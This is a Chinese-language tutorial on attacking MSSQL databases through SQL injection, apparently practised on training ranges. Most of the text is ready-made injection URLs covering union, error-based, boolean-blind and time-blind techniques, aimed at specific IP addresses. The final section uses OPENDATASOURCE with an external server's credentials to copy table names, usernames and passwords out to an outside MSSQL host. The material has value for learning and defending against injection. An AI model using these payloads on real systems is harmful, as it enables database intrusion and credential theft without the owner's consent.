前言

在渗透测试过程中遇到了MSSQL数据库，市面上也有一些文章，不过大多数讲述的都是如何快速利用注入漏洞getshell的，对于MSSQL数据库的注入漏洞没有很详细地描述。在这里我查阅了很多资料，希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试，文章针对实战性教学，在概念描述方面有不懂的还请自行百度，谢谢大家～

注入前准备

1、确定注入点

http://219.153.49.228:40574/new_list.asp?id=2 and 1=1

http://219.153.49.228:40574/new_list.asp?id=2 and 1=2

2、判断是否为mssql数据库

sysobjects为mssql数据库中独有的数据表，此处页面返回正常即可表示为mssql数据库。

http://219.153.49.228:40574/new_list.asp?id=2 and (select count(*) from sysobjects)>0

还可以通过MSSQL数据库中的延时函数进行判断，当语句执行成功，页面延时返回即表示为MSSQL数据库。

http://219.153.49.228:40574/new_list.asp?id=2;WAITFOR DELAY '00:00:10'; -- asd

3、相关概念

系统自带库

MSSQL安装后默认带了6个数据库，其中4个系统级库：master，model，tempdb和msdb；2个示例库：Northwind Traders和pubs。
这里了解一下系统级库：

master：主要为系统控制数据库，其中包括了所有配置信息、用户登录信息和当前系统运行情况。
model：模版数据库
tempdb：临时容器
msdb：主要为用户使用，所有的告警、任务调度等都在这个数据库中。

系统自带表

MSSQL数据库与Mysql数据库一样，有安装自带的数据表sysobjects和syscolumns等，其中需要了解的就是这两个数据表。

sysobjects：记录了数据库中所有表，常用字段为id、name和xtype。
syscolumns：记录了数据库中所有表的字段，常用字段为id、name和xtype。

就如字面意思所述，id为标识，name为对应的表名和字段名，xtype为所对应的对象类型。一般我们使用两个，一个’U’为用户所创建，一个’S’为系统所创建。其他对象类型如下：

对象类型：
AF = 聚合函数 (CLR)
C = CHECK 约束
D = DEFAULT（约束或独立）
F = FOREIGN KEY 约束
FN = SQL 标量函数
FS = 程序集 (CLR) 标量函数
FT = 程序集 (CLR) 表值函数
IF = SQL 内联表值函数
IT = 内部表
P = SQL 存储过程
PC = 程序集 (CLR) 存储过程
PG = 计划指南
PK = PRIMARY KEY 约束
R = 规则（旧式，独立）
RF = 复制筛选过程
S = 系统基表
SN = 同义词
SQ = 服务队列
TA = 程序集 (CLR) DML 触发器
TF = SQL 表值函数
TR = SQL DML 触发器
U = 表（用户定义类型）
UQ = UNIQUE 约束
V = 视图
X = 扩展存储过程

排序&获取下一条数据

mssql数据库中没有limit排序获取字段，但是可以使用top 1来显示数据中的第一条数据，后面与Oracle数据库注入一样，使用<>或not in 来排除已经显示的数据，获取下一条数据。但是与Oracle数据库不同的是使用not in的时候后面需要带上(‘’)，类似数组，也就是不需要输入多个not in来获取数据，这可以很大程序减少输入的数据量，如下：

#使用<>获取数据
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name<>'id' and name<>'username'-- qwe
#使用not in获取数据
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe

堆叠注入

在SQL中，执行语句是通过;分割的，如果我们输入的;被数据库带入执行，那么就可以在其后加入sql执行语句，导致多条语句一起执行的注入，我们将其命名为堆叠注入。具体情况如下，很明显两条语句都进行了执行。

http://192.168.150.4:9001/less-1.asp?id=1';WAITFOR DELAY '0:0:5';-- qwe

显错注入

1、判断当前字段数

http://219.153.49.228:40574/new_list.asp?id=2 order by 4

http://219.153.49.228:40574/new_list.asp?id=2 order by 5

通过order by报错情况，可以判断出当前字段为4。

2、联合查询，获取显错点

1、首先因为不知道具体类型，所以还是先用null来填充字符

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,null,null,null -- qwe

2、替换null为’null’，获取显错点

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'null','null',null -- qwe

当第一个字符设置为字符串格式时，页面报错，很明显这个就是id了，为整型字符。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select 'null','null','null',null -- qwe

3、通过显错点获取数据库信息

1、获取数据库版本

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select @@version),null -- qwe

2、查询当前数据库名称
通过查询db_name()里的内容，获取所有数据库库名

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name()),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(1)),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(2)),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(3)),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(4)),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(5)),null -- qwe

3、查询当前用户

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select user),null -- qwe

4、查询表名

查询dbo.sysobjects表中用户创建的表，获取其对应的id和name

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype='U' -- qwe

查询下一个表名

#使用<>获取下一条数据
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id <> 5575058 -- qwe
#使用not in获取下一条数据
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id not in ('5575058') -- qwe

5、查询列名

这里有个坑，查询列名的时候因为已经知道了表名的id值，所以where只需要使用id即可，不再需要xtype了。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058'-- qwe

http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe

6、information_schema

值得一提的是，除了借助sysobjects表和syscolumns表获取表名、列名外，mssql数据库中也兼容information_schema，里面存放了数据表表名和字段名，但是查询的数据好像存在一些问题，只查询到了manager表。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 table_name from information_schema.tables where table_name <> 'manager'),null -- qwe

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' ),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' and column_name not in ('id','username')),null -- qwe

7、获取数据

http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,username,password,null from manage-- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,username,password,null from manage where username <> 'admin_mz'-- qwe

解密获取密码

报错注入

mssql数据库是强类型语言数据库，当类型不一致时将会报错，配合子查询即可实现报错注入。

1、直接报错

等号两边数据类型不一致配合子查询获取数据。

#获取数据库库名
?id=1' and 1=(select db_name()) -- qwe

#获取第一个表名
?id=1' and 1=(select top 1 name from dbo.sysobjects) -- qwe

#将数据连接显示
?id=1'  and 1=stuff((select db_name() for xml path('')),1,0,'')--+

2、convert()函数

convert(int,db_name())，将第二个参数的值转换成第一个参数的int类型。

具体用法如下：

#获取数据库库名
?id=1' and 1=convert(int,(select db_name())) -- qwe

#获取数据库版本
?id=1' and 1=convert(int,(select @@version))) -- qwe

3、cast()函数

CAST(expression AS data_type)，将as前的参数以as后指定了数据类型转换。

具体用法如下：

#查询当前数据库
?id=1' and 1=(select cast(db_name() as int)) -- qe

#查询第一个数据表
?id=1' and 1=(select top 1 cast(name as int) from dbo.sysobjects) -- qe

4、数据组合输出

#将数据表组合输出
?id=1' and 1=stuff((select quotename(name) from dbo.sysobjects  for xml path('')),1,0,'')--+

#查询users表中的用户名并组合输出
?id=1'  and 1=stuff((select quotename(username) from users for xml path('')),1,0,'')--+

布尔盲注

1、查询数据库库名

1、查询数据库库名长度为11

http://219.153.49.228:40768/new_list.asp?id=2 and len((select top 1 db_name()))=11

2、查询第一个字符的ascii码为109

http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),1,1))=109
http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),1,1))>109

3、查询第二个字符的ascii码为111

http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),2,1))=111

4、获取所有ascii码之后，解码获取数据

2、查询表名

除了像上面查询库名使用了ascii码外，还可以直接猜解字符串

http://219.153.49.228:40768/new_list.asp?id=2 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m'

http://219.153.49.228:40768/new_list.asp?id=2 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,6)='manage'

延时盲注

1、延时函数 WAITFOR DELAY

语法：n表示延时几秒
WAITFOR DELAY '0:0:n'id=1 if (布尔盲注的判断语句) WAITFOR DELAY '0:0:5' -- qwe

2、查询数据

#判断如果第一个库的库名的第一个字符的ascii码为109，则延时5秒
http://219.153.49.228:40768/new_list.asp?id=2 if (ascii(substring((select top 1 db_name()),1,1))=109) WAITFOR DELAY '0:0:5' -- qwe

#判断如果第一个表的表名的第一个字符为m，则延时5秒
http://219.153.49.228:40768/new_list.asp?id=2 if (substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m') WAITFOR DELAY '0:0:5' -- qwe

反弹注入

就像在Mysql中可以通过dnslog外带，Oracle可以通过python搭建一个http服务器接收外带的数据一样，在MSSQL数据库中，我们同样有方法进行数据外带，那就是通过反弹注入外带数据。
反弹注入条件相对苛刻一些，一是需要一台搭建了mssql数据库的vps服务器，二是需要开启堆叠注入。
反弹注入需要使用opendatasource函数。

OPENDATASOURCE(provider_name,init_string):使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。

1、环境准备

1、首先打开靶场

3、连接vps的mssql数据库，新建表test，字段数与类型要与要查询的数据相同。这里因为我想查询的是数据库库名，所以新建一个表里面只有一个字段，类型为varchar。

CREATE TABLE test(name VARCHAR(255))

2、获取数据库所有表

1、使用反弹注入将数据注入到表中，注意这里填写的是数据库对应的参数，最后通过空格隔开要查询的数据。

#查询sysobjects表
?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.sysobjects where xtype='U' -- qwe
#查询information_schema数据库
?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select table_name from information_schema.tables -- qwe

2、执行成功页面返回正常。

3、在数据库中成功获取到数据。

3、获取数据库admin表中的所有列名

#查询information_schema数据库
?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select column_name from information_schema.columns where table_name='admin'-- qwe
#查询syscolumns表
?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.syscolumns where id=1977058079-- qwe

4、获取数据

1、首先新建一个表，里面放三个字段，分别是id，username和passwd。

CREATE TABLE data(id INT,username VARCHAR(255),passwd VARCHAR(255))

2、获取admin表中的数据

?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.data select id,username,passwd from  admin -- qwe

总结

完成这篇文章共费时1周，主要花时间在环境搭建以及寻找在线靶场。全文从显错注入、报错注入到盲注和反弹注入，几乎涵盖了所有MSSQL注入类型，若有所遗漏还请联系我，我必将在原文基础上进行改进。因为能力有限，本文未进行太多了原理描述，也因为SQL注入原理市面上已经有很多文章进行了讲解，所以文章最终以实战注入作为重心开展，讲述找寻到注入点后在如何在多种情况下获取数据。靶场采用墨者学院、掌控安全，以及MSSQL-sqli-labs靶场，实际攻击时还需要考虑waf绕过等，后续会计划完成一篇针对waf绕过和提权getshell的文章，敬请期待～

有需要相关学习资料的朋友可以关注私信我哦！！！